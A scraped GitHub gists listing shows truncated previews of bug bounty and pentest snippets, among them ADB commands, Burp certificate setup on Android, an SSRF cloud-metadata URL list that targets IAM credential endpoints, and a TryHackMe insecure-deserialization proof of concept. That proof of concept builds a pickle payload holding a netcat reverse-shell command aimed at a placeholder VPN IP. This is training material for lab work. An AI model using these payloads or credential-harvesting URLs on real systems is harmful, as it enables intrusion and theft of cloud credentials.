This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
1UC1F3R616
/ AdbCommands
Created
December 27, 2021 04:53
— forked from Pulimet/AdbCommands
Adb useful commands list
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| adb help // List all comands | |
| == Adb Server | |
| adb kill-server | |
| adb start-server | |
| == Adb Reboot | |
| adb reboot | |
| adb reboot recovery | |
| adb reboot-bootloader |
1UC1F3R616
/ Burp certificate on Android
Created
November 5, 2021 11:30
— forked from PaulSec/Burp certificate on Android
Add your Burp certificate on an Android device
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| To do so: | |
| 1. Export your Burp Certificate | |
| Proxy > Options > CA Certificate > Export in DER format | |
| 2. Convert it to PEM | |
| openssl x509 -inform der -in cacert.der -out burp.pem | |
| 3. Download it on the device |
1UC1F3R616
/ typescript-crash.ts
Created
October 4, 2021 06:25
— forked from bradtraversy/typescript-crash.ts
Basic intro to TypeScript (From YouTube Crash Course)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Basic Types | |
| let id: number = 5 | |
| let company: string = 'Traversy Media' | |
| let isPublished: boolean = true | |
| let x: any = 'Hello' | |
| let ids: number[] = [1, 2, 3, 4, 5] | |
| let arr: any[] = [1, true, 'Hello'] | |
| // Tuple |
1UC1F3R616
/ cloud_metadata.txt
Created
January 19, 2021 11:17
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
1UC1F3R616
/ JavascriptRecon.md
Created
January 19, 2021 04:56
My Javascript Recon Process - BugBounty
1UC1F3R616
/ rce.py
Created
August 28, 2020 14:03
— forked from CMNatic/cloudSettings
TryHackMe OWASP-10-A8: Insecure Deserialization RCE PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pickle | |
| import sys | |
| import base64 | |
| command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f' | |
| class rce(object): | |
| def __reduce__(self): | |
| import os | |
| return (os.system,(command,)) |